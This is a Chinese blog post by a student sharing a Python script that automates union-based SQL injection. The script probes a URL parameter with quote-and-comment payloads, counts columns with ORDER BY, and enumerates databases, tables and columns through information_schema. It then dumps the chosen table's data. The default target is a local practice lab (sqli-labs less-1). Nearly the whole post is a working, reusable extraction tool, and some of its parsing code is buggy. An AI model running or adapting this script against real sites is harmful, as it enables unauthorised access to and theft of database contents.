写了一个python3注入sql的脚本
临近毕业,尝试写一些自动注入和自动扫描的脚本
发现还是不够自动
后面我再改改。现在脖子疼
实现效果
代码如下:
import requests
from bs4 import BeautifulSoup
from colorama import init, Fore, Back, Style
import sys
import time
import urllib.parse
import re
from prettytable import PrettyTable
init(autoreset=True)
class Colored(object):
# 前景色:红色 背景色:默认
def red(self, s):
return Fore.RED + s + Fore.RESET
# 前景色:绿色 背景色:默认
def green(self, s):
return Fore.GREEN + s + Fore.RESET
# 前景色:黄色 背景色:默认
def yellow(self, s):
return Fore.YELLOW + s + Fore.RESET
# 前景色:蓝色 背景色:默认
def blue(self, s):
return Fore.BLUE + s + Fore.RESET
# 前景色:洋红色 背景色:默认
def magenta(self, s):
return Fore.MAGENTA + s + Fore.RESET
# 前景色:青色 背景色:默认
def cyan(self, s):
return Fore.CYAN + s + Fore.RESET
# 前景色:白色 背景色:默认
def white(self, s):
return Fore.WHITE + s + Fore.RESET
# 前景色:黑色 背景色:默认
def black(self, s):
return Fore.BLACK
# 前景色:白色 背景色:绿色
def white_green(self, s):
return Fore.WHITE + Back.GREEN + s + Fore.RESET + Back.RESET
color = Colored()
def single_quotes_injection(url, param_dict, no_param_url): # 单引号注入
if len(param_dict) == 1:
payload_one = url + "%27/**/and/**/1=1--+" # 一定正确的payload
payload_two = url + "%27/**/and/**/1=2--+" # 是否报错的payload
print(
color.white("[")
+ color.blue(time.strftime("%H:%M:%S"))
+ color.white("]")
+ color.white("[")
+ color.magenta("payload")
+ color.white("]")
+ color.white("正在执行")
+ color.green(payload_one)
)
print(
color.white("[")
+ color.blue(time.strftime("%H:%M:%S"))
+ color.white("]")
+ color.white("[")
+ color.magenta("payload")
+ color.white("]")
+ color.white("正在执行")
+ color.green(payload_two)
)
# print(payload_one)
response_one = requests.get(payload_one)
response_two = requests.get(payload_two)
if response_one.status_code != 200:
print(color.red("该网站可能部署了waf"))
# soup_one = BeautifulSoup(response_one.content,'html.parser')
# soup_two = BeautifulSoup(response_two.content,'html.parser')
if len(response_one.text) != len(response_two.text): # 判断是否报错,报错则爆出是sql注入漏洞
print(
color.white("[")
+ color.blue(time.strftime("%H:%M:%S"))
+ color.white("]")
+ color.white("[")
+ color.green("INFO")
+ color.white("]")
+ color.yellow("可能存在sql注入漏洞\n")
+ color.white("[")
+ color.blue(time.strftime("%H:%M:%S"))
+ color.white("]")
+ color.white("[")
+ color.magenta("payload")
+ color.white("]")
+ color.green(payload_one)
+ color.white("\n[")
+ color.blue(time.strftime("%H:%M:%S"))
+ color.white("]")
+ color.white("[")
+ color.magenta("payload")
+ color.white("]")
+ color.green(payload_two)
)
print(
color.white("[")
+ color.blue(time.strftime("%H:%M:%S"))
+ color.white("]")
+ color.white("[")
+ color.green("INFO")
+ color.white("]")
+ color.yellow("正在判断是否有回显")
)
response = requests.get(
url + "%27/**/order/**/by/**/1--+"
) # 通过order by 判断漏洞是否有回显 这是一定正确的response
for i in range(1, 15):
response = requests.get(url + "%27/**/order/**/by/**/" + str(i) + "--+")
# print(len(response.text))
if len(response_one.text) != len(
response.text
): # 判断谁是第一个长度改变的响应体 判断谁是报错的值,如果都没有报错,证明不是报错注入
column_num = i
break
if i == 14: # 判断的长度为14
column_num = 0
if column_num == 0: # 判断是否回显
print(
color.white("[")
+ color.blue(time.strftime("%H:%M:%S"))
+ color.white("]")
+ color.white("[")
+ color.green("INFO")
+ color.white("]")
+ color.red("未开启mysql_error()报错 可以尝试盲注")
)
else:
print(
color.white("[")
+ color.blue(time.strftime("%H:%M:%S"))
+ color.white("]")
+ color.white("[")
+ color.green("INFO")
+ color.white("]")
+ color.yellow("存在回显\n")
+ color.white("[")
+ color.blue(time.strftime("%H:%M:%S"))
+ color.white("]")
+ color.white("[")
+ color.green("INFO")
+ color.white("]")
+ color.yellow("列长为")
+ color.cyan(str(column_num - 1))
+ color.white("\n[")
+ color.blue(time.strftime("%H:%M:%S"))
+ color.white("]")
+ color.white("[")
+ color.magenta("payload")
+ color.white("]"),
end="",
)
payload_mysql = "%27/**/union/**/select/**/"
print(color.green(url + "%27/**/union/**/select/**/"), end="")
# print(column_num)
for j in range(1, column_num):
# print(j)
if j == column_num - 1:
print(color.green(str(j)), end="")
payload_mysql += str(j)
else:
print(color.green(str(j) + ","), end="")
payload_mysql += str(j) + ","
print(color.green("--+")) # 循环输出建议payload中小于列值的数字
payload_mysql += "--+"
for i in param_dict.items():
# print(param_dict)
# print(i[1])
# print(no_param_url + '?' + i[0] + '=' + i[1] + '%27/**/union/**/select/**/1,2,3--+')
echo_response = requests.get(no_param_url + '?' + i[0] + '=' + i[1] + '%27/**/union/**/select/**/1,2,3--+')
echo_1_cnt = str(echo_response.content).count('1')
echo_2_cnt = str(echo_response.content).count('2')
echo_3_cnt = str(echo_response.content).count('3')
# print(echo_1_cnt)
# print(echo_2_cnt)
# print(echo_3_cnt)
if echo_1_cnt == 1:
place_left = str(echo_response.content).find('2')
place_right_one = str(echo_response.content).find('2') + 1
place_right_two = str(echo_response.content).find('2') + 17
right_text = str(echo_response.content)[place_right_one:place_right_two]
# print(right_text)
# print(place_right_one)
print(
color.white("[")
+ color.blue(time.strftime("%H:%M:%S"))
+ color.white("]")
+ color.white("[")
+ color.magenta("payload")
+ color.white("]")
+ color.white("正在执行")
+ color.green(payload_two)
)
echo_response_two = requests.get(no_param_url + '?' + i[0] + '=' + i[1] + '%27/**/union/**/select/**/group_concat(schema_name),2,3/**/from/**/information_schema.schemata--+')
right_place = str(echo_response_two.content).find(right_text)
dbs = str(echo_response_two.content)[place_left:right_place]
version_payload = no_param_url + '?' + i[0] + '=' + i[1] + '%27/**/union/**/select/**/version(),2,3--+'
version_request = requests.get(version_payload)
version_right_place = str(version_request.content).find(right_text)
version = str(version_request.content)[place_left:version_right_place]
# print(version)
if '<' in version:
place = version.find('<')[0]
result_version = version[:place]
if '"' in version:
place = version.find('"')[0]
result_version = version[:place]
else:
result_version = version
print(
color.white("[")
+ color.blue(time.strftime("%H:%M:%S"))
+ color.white("]")
+ color.white("[")
+ color.magenta("Version")
+ color.white("]")
+ color.white("数据库版本 ")
+ color.green(result_version)
)
# print(result_version)
version_table = PrettyTable(["Version"])
version_table.add_row([result_version])
print(version_table)
# print(dbs)
if '<' in dbs:
place = dbs.find('<')[0]
database = dbs[:place]
if '"' in dbs:
place = dbs.find('"')[0]
database = dbs[:place]
else:
database = dbs
print(
color.white("[")
+ color.blue(time.strftime("%H:%M:%S"))
+ color.white("]")
+ color.white("[")
+ color.magenta("database")
+ color.white("]")
+ color.yellow("数据库有\n")
)
dbs_list = database.split(',')
dbs_table = PrettyTable(["Database"])
for dbs_row in dbs_list:
dbs_table.add_row([dbs_row])
print(dbs_table)
inj_database = input(
color.white("[")
+ color.blue(time.strftime("%H:%M:%S"))
+ color.white("]")
+ color.white("[")
+ color.magenta("输入")
+ color.white("]")
+ color.yellow("请输入你要注入的数据库:")
)
table_payload = no_param_url + '?' + i[0] + '=' + i[1] + '%27/**/union/**/select/**/group_concat(table_name),2,3/**/from/**/information_schema.tables where table_schema=' + '"' + inj_database + '"' + '--+'
print(
color.white("[")
+ color.blue(time.strftime("%H:%M:%S"))
+ color.white("]")
+ color.white("[")
+ color.magenta("payload")
+ color.white("]")
+ color.white("正在执行")
+ color.green(table_payload)
)
echo_response_three = requests.get(table_payload)
right_place = str(echo_response_three.content).find(right_text)
tables = str(echo_response_three.content)[place_left:right_place]
# print(tables)
if '<' in tables:
place = tables.find('<')[0]
tbs = tables[:place]
if '"' in tables:
place = tables.find('"')[0]
tbs = tables[:place]
else:
tbs = tables
print(
color.white("[")
+ color.blue(time.strftime("%H:%M:%S"))
+ color.white("]")
+ color.white("[")
+ color.magenta("tables")
+ color.white("]")
+ color.yellow("表有\n")
# + color.green(tbs)
)
tbs_list = tbs.split(',')
# print(tbs_list)
tbs_table = PrettyTable(["Tables_in_" + inj_database])
for tbs_row in tbs_list:
tbs_table.add_row([tbs_row])
print(tbs_table)
inj_table = input(
color.white("[")
+ color.blue(time.strftime("%H:%M:%S"))
+ color.white("]")
+ color.white("[")
+ color.magenta("输入")
+ color.white("]")
+ color.yellow("请输入你要注入的表:")
)
column_payload = no_param_url + '?' + i[0] + '=' + i[1] + '%27/**/union/**/select/**/group_concat(column_name),2,3/**/from/**/information_schema.columns/**/where/**/table_name="' + inj_table + '"--+'
print(
color.white("[")
+ color.blue(time.strftime("%H:%M:%S"))
+ color.white("]")
+ color.white("[")
+ color.magenta("payload")
+ color.white("]")
+ color.white("正在执行")
+ color.green(column_payload)
)
# print(column_payload)
echo_column_response = requests.get(column_payload)
right_place = str(echo_column_response.content).find(right_text)
columns = str(echo_column_response.content)[place_left:right_place]
if '<' in columns:
place = columns.find('<')[0]
clms = columns[:place]
if '"' in columns:
place = columns.find('"')[0]
clms = columns[:place]
else:
clms = columns
print(
color.white("[")
+ color.blue(time.strftime("%H:%M:%S"))
+ color.white("]")
+ color.white("[")
+ color.magenta("columns")
+ color.white("]")
+ color.yellow("列有\n")
# + color.green(clms)
)
change_clms = clms.replace(',', '," ",')
clms_list = clms.split(',')
clms_table = PrettyTable(clms_list)
value_payload = no_param_url + '?' + i[0] + '=' + i[1] + '%27/**/union/**/select/**/group_concat('+ change_clms +'),2,3/**/from/**/' + inj_table +'--+'
echo_value_response = requests.get(value_payload)
right_place = str(echo_value_response.content).find(right_text)
value = str(echo_value_response.content)[place_left:right_place]
result_value = value.split(',')
for i in result_value:
value_list = i.split(' ')
clms_table.add_row(value_list)
print(clms_table)
elif echo_2_cnt == 1:
place_left = str(echo_response.content).find('2')
place_right_one = str(echo_response.content).find('2') + 1
place_right_two = str(echo_response.content).find('2') + 17
right_text = str(echo_response.content)[place_right_one:place_right_two]
# print(right_text)
# print(place_right_one)
print(
color.white("[")
+ color.blue(time.strftime("%H:%M:%S"))
+ color.white("]")
+ color.white("[")
+ color.magenta("payload")
+ color.white("]")
+ color.white("正在执行")
+ color.green(payload_two)
)
echo_response_two = requests.get(no_param_url + '?' + i[0] + '=' + i[1] + '%27/**/union/**/select/**/1,group_concat(schema_name),3/**/from/**/information_schema.schemata--+')
right_place = str(echo_response_two.content).find(right_text)
dbs = str(echo_response_two.content)[place_left:right_place]
version_payload = no_param_url + '?' + i[0] + '=' + i[1] + '%27/**/union/**/select/**/1,version(),3--+'
version_request = requests.get(version_payload)
version_right_place = str(version_request.content).find(right_text)
version = str(version_request.content)[place_left:version_right_place]
# print(version)
if '<' in version:
place = version.find('<')[0]
result_version = version[:place]
if '"' in version:
place = version.find('"')[0]
result_version = version[:place]
else:
result_version = version
print(
color.white("[")
+ color.blue(time.strftime("%H:%M:%S"))
+ color.white("]")
+ color.white("[")
+ color.magenta("Version")
+ color.white("]")
+ color.white("数据库版本 ")
+ color.green(result_version)
)
# print(result_version)
version_table = PrettyTable(["Version"])
version_table.add_row([result_version])
print(version_table)
# print(dbs)
if '<' in dbs:
place = dbs.find('<')[0]
database = dbs[:place]
if '"' in dbs:
place = dbs.find('"')[0]
database = dbs[:place]
else:
database = dbs
print(
color.white("[")
+ color.blue(time.strftime("%H:%M:%S"))
+ color.white("]")
+ color.white("[")
+ color.magenta("database")
+ color.white("]")
+ color.yellow("数据库有\n")
)
dbs_list = database.split(',')
dbs_table = PrettyTable(["Database"])
for dbs_row in dbs_list:
dbs_table.add_row([dbs_row])
print(dbs_table)
inj_database = input(
color.white("[")
+ color.blue(time.strftime("%H:%M:%S"))
+ color.white("]")
+ color.white("[")
+ color.magenta("输入")
+ color.white("]")
+ color.yellow("请输入你要注入的数据库:")
)
table_payload = no_param_url + '?' + i[0] + '=' + i[1] + '%27/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables where table_schema=' + '"' + inj_database + '"' + '--+'
print(
color.white("[")
+ color.blue(time.strftime("%H:%M:%S"))
+ color.white("]")
+ color.white("[")
+ color.magenta("payload")
+ color.white("]")
+ color.white("正在执行")
+ color.green(table_payload)
)
echo_response_three = requests.get(table_payload)
right_place = str(echo_response_three.content).find(right_text)
tables = str(echo_response_three.content)[place_left:right_place]
# print(tables)
if '<' in tables:
place = tables.find('<')[0]
tbs = tables[:place]
if '"' in tables:
place = tables.find('"')[0]
tbs = tables[:place]
else:
tbs = tables
print(
color.white("[")
+ color.blue(time.strftime("%H:%M:%S"))
+ color.white("]")
+ color.white("[")
+ color.magenta("tables")
+ color.white("]")
+ color.yellow("表有\n")
# + color.green(tbs)
)
tbs_list = tbs.split(',')
# print(tbs_list)
tbs_table = PrettyTable(["Tables_in_" + inj_database])
for tbs_row in tbs_list:
tbs_table.add_row([tbs_row])
print(tbs_table)
inj_table = input(
color.white("[")
+ color.blue(time.strftime("%H:%M:%S"))
+ color.white("]")
+ color.white("[")
+ color.magenta("输入")
+ color.white("]")
+ color.yellow("请输入你要注入的表:")
)
column_payload = no_param_url + '?' + i[0] + '=' + i[1] + '%27/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name="' + inj_table + '"--+'
print(
color.white("[")
+ color.blue(time.strftime("%H:%M:%S"))
+ color.white("]")
+ color.white("[")
+ color.magenta("payload")
+ color.white("]")
+ color.white("正在执行")
+ color.green(column_payload)
)
# print(column_payload)
echo_column_response = requests.get(column_payload)
right_place = str(echo_column_response.content).find(right_text)
columns = str(echo_column_response.content)[place_left:right_place]
if '<' in columns:
place = columns.find('<')[0]
clms = columns[:place]
if '"' in columns:
place = columns.find('"')[0]
clms = columns[:place]
else:
clms = columns
print(
color.white("[")
+ color.blue(time.strftime("%H:%M:%S"))
+ color.white("]")
+ color.white("[")
+ color.magenta("columns")
+ color.white("]")
+ color.yellow("列有\n")
# + color.green(clms)
)
change_clms = clms.replace(',', '," ",')
clms_list = clms.split(',')
clms_table = PrettyTable(clms_list)
value_payload = no_param_url + '?' + i[0] + '=' + i[1] + '%27/**/union/**/select/**/1,group_concat('+ change_clms +'),3/**/from/**/' + inj_table +'--+'
echo_value_response = requests.get(value_payload)
right_place = str(echo_value_response.content).find(right_text)
value = str(echo_value_response.content)[place_left:right_place]
result_value = value.split(',')
for i in result_value:
value_list = i.split(' ')
# print(value_list)
clms_table.add_row(value_list)
print(clms_table)
elif echo_3_cnt == 1:
pass
else:
print(
color.white("[")
+ color.blue(time.strftime("%H:%M:%S"))
+ color.white("]")
+ color.white("[")
+ color.green("返回")
+ color.white("]")
+ color.red("不存在sql注入")
)
def get_url_param(url):
try:
index = url.find("?")
if index < 0:
result_url = url
else:
result_url = url[:index]
url_param = dict(urllib.parse.parse_qsl(urllib.parse.urlsplit(url).query))
result_param = {}
for key, value in url_param.items():
try:
if isinstance(int(value), int):
if int(value) > 0:
result_param[key] = '-' + value
elif int(value) == 0:
result_param[key] = '-1'
else:
result_param[key] = '-1'
else:
result_param[key] = value
except:
result_param[key] = value
# print(result_param)
for key, value in result_param.items():
try:
request_url = result_url + '?' + key + '=' + str(abs(int(value)))
except:
request_url = url
return [result_url, result_param, request_url]
except:
print(
color.white("[")
+ color.blue(time.strftime("%H:%M:%S"))
+ color.white("]")
+ color.white("[")
+ color.green("错误")
+ color.white("]")
+ color.red("没有参数可以注入")
)
sys.exit(0)
if __name__ == "__main__":
url = "http://localhost/less-1/?id=1"
url_and_param = get_url_param(url)
# print(url_and_param)
no_param_url = url_and_param[0]
json_param = url_and_param[1]
param_url = url_and_param[2]
single_quotes_injection(param_url, json_param, no_param_url)
# number_injection('http://localhost/less-2/?id=1')